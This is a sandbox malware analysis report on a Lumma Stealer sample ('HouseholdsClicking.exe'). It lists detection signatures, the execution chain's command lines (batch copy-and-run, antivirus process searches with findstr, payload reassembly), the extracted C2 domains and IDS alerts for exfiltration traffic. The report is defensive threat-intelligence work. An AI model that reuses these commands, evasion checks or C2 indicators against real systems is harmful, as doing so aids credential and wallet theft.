Edit tour

Windows Analysis Report
HouseholdsClicking.exe

Overview

General Information

Sample name:	HouseholdsClicking.exe
Analysis ID:	1587455
MD5:	c3c0fbe6393929c60e63885bab2603f6
SHA1:	09c0cb9efeaa8808710df3f47b3c56fcd323b8bd
SHA256:	2fbecbe7ba6ce56cfe6b6da8e7aaf6127755161a7ef340b7b20c2b061404f022
Tags:	exeLummaStealeruser-zhuzhu0009
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Performs DNS queries to domains with low reputation

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Suspicious Copy From or To System Directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

HouseholdsClicking.exe (PID: 3604 cmdline: "C:\Users\user\Desktop\HouseholdsClicking.exe" MD5: C3C0FBE6393929C60E63885BAB2603F6)

cmd.exe (PID: 2008 cmdline: "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1740 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 4464 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 5516 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5252 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6408 cmdline: cmd /c md 19152 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 2144 cmdline: findstr /V "Bookmarks" Sv MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5608 cmdline: cmd /c copy /b ..\Distance + ..\Butt + ..\Roland + ..\July + ..\Islam + ..\Argentina M MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Appliance.com (PID: 4504 cmdline: Appliance.com M MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 480 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["debonairnukk.xyz", "sordid-snaked.cyou", "wrathful-jammy.cyou", "ingreem-eilish.biz", "immureprech.biz", "diffuculttan.xyz", "awake-weaves.cyou", "deafeninggeh.biz", "effecterectz.xyz"], "Build id": "HpOoIh--3fe7f419a360"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000A.00000003.1994621887.0000000001CA5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000A.00000002.2115489202.000000000437E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000A.00000003.1995305908.0000000004ACC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Appliance.com PID: 4504	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Appliance.com PID: 4504	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Appliance.com PID: 4504	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.Appliance.com.3d0000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HouseholdsClicking.exe", ParentImage: C:\Users\user\Desktop\HouseholdsClicking.exe, ParentProcessId: 3604, ParentProcessName: HouseholdsClicking.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd, ProcessId: 2008, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2008, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5252, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:22.661289+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.102.49.254	443	TCP
2025-01-10T12:06:23.771159+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.64.1	443	TCP
2025-01-10T12:06:24.707840+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.64.1	443	TCP
2025-01-10T12:06:25.928436+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.64.1	443	TCP
2025-01-10T12:06:27.143705+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.64.1	443	TCP
2025-01-10T12:06:28.329583+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.64.1	443	TCP
2025-01-10T12:06:29.625250+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.64.1	443	TCP
2025-01-10T12:06:30.613387+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.64.1	443	TCP
2025-01-10T12:06:32.305834+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:24.232789+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	104.21.64.1	443	TCP
2025-01-10T12:06:25.177022+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49739	104.21.64.1	443	TCP
2025-01-10T12:06:32.770493+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49745	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:24.232789+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49738	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:25.177022+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49739	104.21.64.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:21.962806+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	53762	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:21.894226+0100	2058214	1	Domain Observed Used for C2 Detected	192.168.2.4	60520	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:21.934811+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	64453	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:21.917168+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	54680	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:21.905518+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	61330	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:21.882584+0100	2058222	1	Domain Observed Used for C2 Detected	192.168.2.4	64889	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ingreem-eilish .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:21.870440+0100	2058612	1	Domain Observed Used for C2 Detected	192.168.2.4	51002	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:21.975796+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	53765	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:21.950791+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	50919	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:31.813411+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49744	104.21.64.1	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T12:06:23.171566+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://sputnik-1985.com:443/api2o4p.default-release/key4.dbPK	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/api/	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/Wn3	Avira URL Cloud: Label: malware
Source: https://sordid-snaked.cyou:443/api	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com:443/api	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/Cj9F	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/api#bq	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/shqK	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/%e	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/)g	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/Y	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["debonairnukk.xyz", "sordid-snaked.cyou", "wrathful-jammy.cyou", "ingreem-eilish.biz", "immureprech.biz", "diffuculttan.xyz", "awake-weaves.cyou", "deafeninggeh.biz", "effecterectz.xyz"], "Build id": "HpOoIh--3fe7f419a360"}

Multi AV Scanner detection for submitted file

Source: HouseholdsClicking.exe	Virustotal: Detection: 69%			Perma Link
Source: HouseholdsClicking.exe	ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 88.6% probability

Sample uses string decryption to hide its real strings

Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: sordid-snaked.cyou
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: awake-weaves.cyou
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: wrathful-jammy.cyou
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: debonairnukk.xyz
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: diffuculttan.xyz
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: effecterectz.xyz
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: deafeninggeh.biz
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: immureprech.biz
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ingreem-eilish.biz
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String decryptor: HpOoIh--3fe7f419a360

Source: HouseholdsClicking.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: HouseholdsClicking.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E2DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E2DC54
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E3A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E3A087
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E3A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E3A1E2
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E2E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00E2E472
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E3A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	10_2_00E3A570
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E366DC FindFirstFileW,FindNextFileW,FindClose,	10_2_00E366DC
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DFC622 FindFirstFileExW,	10_2_00DFC622
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E373D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	10_2_00E373D4
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E37333 FindFirstFileW,FindClose,	10_2_00E37333
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E2D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E2D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\19152\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\19152	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.4:60520 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:53762 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058612 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ingreem-eilish .biz) : 192.168.2.4:51002 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:53765 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:50919 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:61330 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:54680 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.4:64889 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:64453 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49737 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49744 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49739 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.64.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: sordid-snaked.cyou
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	URLs: ingreem-eilish.biz
Source: Malware configuration extractor	URLs: immureprech.biz
Source: Malware configuration extractor	URLs: diffuculttan.xyz
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: effecterectz.xyz

Performs DNS queries to domains with low reputation

Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: deafeninggeh.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ingreem-eilish.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: effecterectz.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wrathful-jammy.cyou replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aGpUaEJqSGxZhd.aGpUaEJqSGxZhd replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: immureprech.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: debonairnukk.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: diffuculttan.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sordid-snaked.cyou replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: awake-weaves.cyou replaycode: Name error (3)

Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
